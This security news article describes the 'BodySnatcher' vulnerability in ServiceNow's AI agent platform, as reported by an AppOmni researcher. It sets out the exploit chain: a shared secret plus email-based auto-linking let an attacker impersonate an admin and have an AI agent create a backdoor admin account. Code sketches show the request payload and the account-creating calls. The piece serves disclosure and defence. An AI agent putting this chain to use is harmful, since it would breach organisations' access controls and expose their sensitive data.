The emergence of agentic AI presents new security challenges because it sets autonomous agents loose to act on behalf of humans. Once an AI agent is trusted to execute workflows or make decisions autonomously, any misconfigured permission, shared credential, or flawed linking mechanism can turn that agent into a proxy for attackers, capable of performing real actions at machine scale.
That was evident when Aaron Costello, Chief of Security Research at AppOmni, a SaaS security firm, discovered a critical agentic hijacking vulnerability, known as BodySnatcher, in ServiceNow’s Virtual Agent API and the Now Assist AI Agents application. According to Costello, “AI agents significantly amplify the impact of traditional security flaws.”
“BodySnatcher represents the most severe AI-driven security vulnerability uncovered to date and a defining example of agentic AI security vulnerabilities in modern SaaS platforms.”
The exploit “demonstrates how an attacker can effectively ‘remote control’ an organization’s AI, weaponizing the tools meant to simplify enterprise workflows,” Costello added.
“This finding is particularly significant given the scale of the risk; ServiceNow’s Now Assist and Virtual Agent applications are utilized by nearly half of AppOmni’s Fortune 100 customers.”
What caused the vulnerability, and how can enterprises avoid such exploits in their systems?
How a Single Integration Let Attackers Impersonate Any ServiceNow User
A specific integration between the Virtual Agent API and Now Assist allowed unauthenticated attackers to impersonate any ServiceNow user using only an email address, bypassing multi-factor authentication (MFA), single sign-on (SSO) and other access controls.
By chaining a hardcoded, platform-wide secret with account-linking logic that trusts a simple email address, an attacker would be able to impersonate an administrator and execute an AI agent to override security controls and create backdoor accounts with full privileges.
“Insecure configurations transformed a standard natural language understanding (NLU) chatbot into a silent launchpad for malicious AI agent execution,” according to Costello.
“This could grant nearly unlimited access to everything an organization houses, such as customer Social Security numbers, healthcare information, financial records, or confidential intellectual property.”
The vulnerability affected ServiceNow instances running Now Assist AI Agents (sn_aia) versions 5.0.24 through 5.1.17, and Virtual Agent API (sn_va_as_service) versions 3.15.1 and earlier as well as 4.0.0 through 4.0.3.
AppOmni reported the vulnerability to ServiceNow on October 23, 2025, and the vendor immediately acknowledged receipt. On October 30, ServiceNow fixed the vulnerability and emailed customers to inform them of the fix. It also released a knowledge base article crediting Costello and AppOmni. The company stated this week:
“ServiceNow addressed this vulnerability by deploying a relevant security update to the majority of hosted instances. Security updates were also provided to ServiceNow partners and self-hosted customers. Additionally, the vulnerability is addressed in the listed Store App versions.”
How Virtual Agent Normally Keeps Things Safe
Virtual Agent is ServiceNow’s enterprise chatbot engine, built to simplify everyday tasks inside large organizations. It uses NLU to give users a conversational way to interact with the system’s underlying data and services.
Employees can ask a chatbot to reset a password, order equipment, or file a support ticket, and each request is routed to a predefined workflow known as a “topic.” These topics can only perform actions explicitly allowed by developers, which is why Virtual Agent has long been viewed as relatively low risk.
The Virtual Agent API extends this system beyond ServiceNow’s web interface, allowing external platforms like Slack or Microsoft Teams to send messages into the same topic framework. In that way, users can interact with the system without needing to log in to ServiceNow directly.
Rather than exposing separate endpoints for each integration, ServiceNow uses a shared API and distinguishes callers using “providers” and “channels.” Each provider defines how requests are authenticated and how an external user is linked to a ServiceNow account.
For authentication, many providers rely on Message Auth, which uses a static secret tied to the integration rather than a specific user. To determine who the user is, providers can enable a feature called auto-linking, which associates an external identity with a ServiceNow account. Once linked, all actions run with that user’s permissions.
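To make that flow concrete, below is a minimal sketch of the kind of message an external integration sends to the Virtual Agent API. The endpoint path and field names are illustrative approximations rather than ServiceNow's exact schema; the point is that the token authenticates the integration as a whole, while a caller-supplied email alone identifies the user to be linked.

```python
# Illustrative sketch of an external platform calling the Virtual Agent API.
# Endpoint path and field names are approximations, not ServiceNow's exact schema.
import requests

INSTANCE = "https://example.service-now.com"
MESSAGE_AUTH_TOKEN = "<static secret configured on the provider>"  # tied to the integration, not to any user

payload = {
    "token": MESSAGE_AUTH_TOKEN,          # Message Auth: one shared secret for the whole integration
    "requestId": "demo-request-001",
    "userId": "external-user-42",         # identity asserted by the external platform
    "emailId": "employee@example.com",    # auto-linking maps this email to a ServiceNow account
    "message": {"text": "Reset my password", "typed": True},
}

resp = requests.post(f"{INSTANCE}/api/sn_va_as_service/bot/integration", json=payload, timeout=30)
print(resp.status_code)
```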
Configuration Choices That Opened the Door
The vulnerability emerged when ServiceNow introduced new providers for its Now Assist AI Agents to extend the capabilities of the Virtual Agent API beyond bot-to-bot use cases to support bot-to-agent or agent-to-agent (A2A) interactions.
Because each integration uses its own provider within ServiceNow to define how incoming messages are authenticated, the vendor avoided the need to create new API endpoints for each integration. As Costello noted:
“It’s reasonable to assume ServiceNow chose this approach to provide a more seamless experience for end users, fully leveraging the transparent nature of auto-linking.”
These providers reused the same Message Auth and auto-linking mechanisms, but with critical flaws.
The providers “shipped with the exact same secret across all ServiceNow instances. This meant anyone who knew or obtained the token could interact with the Virtual Agent API of any customer environment where these providers were active,” according to Costello.
Worse, the auto-linking logic trusted any request that presented this shared secret, without requiring multi-factor authentication. An attacker only needed to supply a valid email address to be linked to that user’s ServiceNow account. From that point on, Virtual Agent treated the attacker as the impersonated user.
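The sketch below is a conceptual illustration (not ServiceNow code; all names and structures are invented) of why that linking decision failed, alongside a hardened variant that would have broken the chain at the impersonation stage.

```python
# Conceptual sketch contrasting the flawed auto-linking check with a hardened
# version. Names and data structures are invented for illustration only.
from dataclasses import dataclass

@dataclass
class Provider:
    shared_secret: str        # as shipped: identical across every customer instance
    require_mfa: bool = False

USERS = {"admin@example.com": {"sys_id": "abc123", "roles": ["admin"]}}

def auto_link_vulnerable(request: dict, provider: Provider) -> dict:
    # Gate 1: a static, platform-wide secret anyone could reuse across customers.
    if request["token"] != provider.shared_secret:
        raise PermissionError("invalid Message Auth token")
    # Gate 2: the caller-supplied email is accepted as proof of identity.
    return USERS[request["emailId"]]      # the session now runs as this user

def auto_link_hardened(request: dict, provider: Provider) -> dict:
    if request["token"] != provider.shared_secret:
        raise PermissionError("invalid Message Auth token")
    user = USERS[request["emailId"]]
    if provider.require_mfa and not request.get("mfa_verified"):
        raise PermissionError("MFA challenge required before linking")
    return user

if __name__ == "__main__":
    provider = Provider(shared_secret="platform-wide-secret", require_mfa=True)
    attacker_request = {"token": "platform-wide-secret", "emailId": "admin@example.com"}
    print(auto_link_vulnerable(attacker_request, provider))   # impersonation succeeds
    try:
        auto_link_hardened(attacker_request, provider)
    except PermissionError as exc:
        print(exc)                                            # chain broken at linking
```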
At first, the security risk appeared to be limited. Messages were asynchronous, and responses were routed to predefined endpoints the attacker couldn’t control.
“Nevertheless, the token provided a universal, instance-agnostic authentication bypass that should never have existed at all,” Costello pointed out.
But it soon became clear that the potential for exploitation was far more serious.
To support agent-to-agent communication, ServiceNow added an A2A Scripted REST API that converts requests into Virtual Agent messages and injects them directly into the execution queue. If an AI agent is active and the caller has sufficient permissions, it can be executed directly, even outside expected channels.
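Conceptually, the pattern looks something like the sketch below. This is not ServiceNow's implementation, just an illustration of how an inbound HTTP payload can be rewrapped as a Virtual Agent message and pushed straight onto an execution queue, with no channel or Now Assist check in between.

```python
# Purely conceptual sketch of the A2A pattern described above: an inbound
# request is converted into a Virtual Agent message and queued for execution.
from queue import Queue

execution_queue: Queue = Queue()

def a2a_rest_handler(payload: dict) -> None:
    """Convert an agent-to-agent request into a queued Virtual Agent message."""
    va_message = {
        "user": payload["linked_user"],        # whoever auto-linking resolved
        "agent": payload["target_agent"],      # any active agent, deployed to a channel or not
        "instruction": payload["instruction"],
    }
    execution_queue.put(va_message)            # no channel or Now Assist check at this point

if __name__ == "__main__":
    a2a_rest_handler({
        "linked_user": "admin@example.com",
        "target_agent": "record_management",
        "instruction": "create a record in sys_user",
    })
    print(execution_queue.get())   # executed with the linked user's privileges
```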
By combining user impersonation with ServiceNow’s shipped AI agents, attackers could escalate quickly.
At the time of discovery, one of the built-in AI agents was capable of creating records in arbitrary database tables. Executed under an impersonated admin account, it could create a new user, assign the admin role, reset the password, and grant full access—all without ever logging in as a real user.
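For a sense of what "creating records in arbitrary database tables" amounts to, the sketch below expresses equivalent operations through ServiceNow's standard Table API. It is a hypothetical illustration, not the agent's actual code; authentication is omitted, and the role sys_id is a placeholder.

```python
# Hypothetical illustration of the record operations described above, expressed
# via the standard Table API rather than the agent itself. Authentication is
# omitted; run under an impersonated admin, equivalent inserts create a backdoor account.
import requests

INSTANCE = "https://example.service-now.com"
session = requests.Session()
session.headers.update({"Accept": "application/json"})

# 1. Insert a new user record into the sys_user table.
new_user = session.post(f"{INSTANCE}/api/now/table/sys_user", json={
    "user_name": "svc.backdoor",
    "email": "backdoor@example.com",
}, timeout=30).json()["result"]

# 2. Grant the admin role by inserting into sys_user_has_role.
session.post(f"{INSTANCE}/api/now/table/sys_user_has_role", json={
    "user": new_user["sys_id"],
    "role": "<sys_id of the admin role>",   # placeholder
}, timeout=30)
```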
“With respect to what was publicly understood regarding the availability of AI agents on the platform, this understanding is groundbreaking,” according to Costello.
“The general consensus was that in order for an AI agent to be executed outside of testing, it must be deployed to a channel that has explicitly enabled the Now Assist feature. But this is not the case. Evidently, as long as the agent is in an active state, and the calling user has the necessary permissions, it can be executed directly through these topics.”
Once an attacker could impersonate a user and invoke autonomous AI agents, Virtual Agent’s original guardrails no longer mattered.
How to Lock It Down: Practical Security Best Practices for Agentic AI Systems
ServiceNow patched the BodySnatcher exploit by rotating the provider credentials and removing the Record Management AI agent used in the proof of concept.
The vendor stated:
“At this time, ServiceNow is unaware of this issue being exploited in the wild against customer instances. However, due to the potential for increased risk when vulnerabilities are publicly disclosed, we recommend that… customers promptly apply an appropriate security update or upgrade if they have not already done so.”
But Costello noted that “point-in-time fixes do not eliminate systemic risk from insecure provider and agent configurations.” The configuration choices that led to this vulnerability in ServiceNow “could still exist in an organization’s custom code or third-party solutions.”
“Rather than merely disrupting the exploit at a single stage, a more resilient strategy involves addressing the fundamental configuration choices that enabled it in the first place.”
Costello recommends that ServiceNow customers using its on-premises product “should immediately upgrade to, at minimum, the earliest fixed version of each affected application to secure their environment.” Cloud-hosted customers do not need to take action.
To prevent the abuse of agentic AI in conversational channels, Costello outlines three best practices that security teams and platform administrators should follow:
- Requiring strong provider configuration controls, including enforced MFA for account linking
- Establishing an automated agent approval process
- Disabling unused and inactive agents
“Had MFA been a default requirement for these AI agent providers during the account-linking process, the BodySnatcher exploit chain would have been broken at the impersonation stage.”
ServiceNow provides customers with the flexibility to enforce MFA for any provider. Software-based authenticators are preferable to text messages, given the rising risk of targeted SMS phishing and SIM-swapping attacks, Costello noted.
And although ServiceNow removed the Record Management AI agent from customer environments, developers can still build powerful custom AI agents on the platform, so it’s important to implement an automated agent approval process using ServiceNow’s AI Control Tower application.
Because an active agent can be abused even if it is not deployed to any bot or channel, agents that have not been used for more than 90 days should be deactivated or deleted, Costello added.
“By implementing a regular auditing cadence for agents, organizations can reduce the blast radius of an attack.”
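A minimal sketch of such an audit is shown below. It assumes a hypothetical agent table name (sn_aia_agent) and field names (active, last_executed), so the actual schema on a given instance will differ; authentication is omitted.

```python
# Minimal sketch of a periodic agent audit. Table and field names are
# hypothetical placeholders; check your instance's actual schema.
import requests
from datetime import datetime, timedelta, timezone

INSTANCE = "https://example.service-now.com"
cutoff = (datetime.now(timezone.utc) - timedelta(days=90)).strftime("%Y-%m-%d")

# Query active agents whose last execution predates the 90-day cutoff.
resp = requests.get(
    f"{INSTANCE}/api/now/table/sn_aia_agent",   # hypothetical table name
    params={
        "sysparm_query": f"active=true^last_executed<{cutoff}",  # hypothetical field names
        "sysparm_fields": "sys_id,name,last_executed",
    },
    timeout=30,
)

for agent in resp.json().get("result", []):
    print(f"Stale active agent: {agent['name']} (last executed {agent['last_executed']})")
    # Deactivate via a PATCH to the record, or route it to an approval workflow for review.
```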
Agentic AI Raises the Stakes for Enterprise Security
The discovery of BodySnatcher shows how an attacker can effectively take remote control of an organization’s AI, turning tools meant to simplify enterprise workflows into weapons. None of this required clever prompt injection. The vulnerability came from traditional issues: shared secrets, overly trusting auto-linking logic, and assumptions about how systems would be used. Costello stated:
“These findings together confirm a troubling trend: AI agents are becoming more powerful and being built to handle more than just basic tasks.”
The deployment of AI agents emphasizes the importance of identity and trust controls. A chatbot that can only answer questions is one thing. An AI agent that can create users, assign roles, or modify records is something else entirely.
The incident is a reminder for anyone deploying AI agents inside enterprise systems that automation doesn’t reduce risk by default. If anything, it raises the stakes when old security shortcuts are left in place.
“[T]his exploit is not an isolated incident. It builds upon my previous research into ServiceNow’s Agent-to-Agent discovery mechanism, which detailed how attackers can trick AI agents into recruiting more powerful AI agents to fulfil a malicious task.”
“This shift means that without hard guardrails, an agent’s power is directly proportional to the risk it poses to the platform, creating fertile ground for vulnerabilities and misconfigurations.”
While automated defenses are critical, security teams and platform administrators still need a clear understanding of how SaaS security and AI security have converged.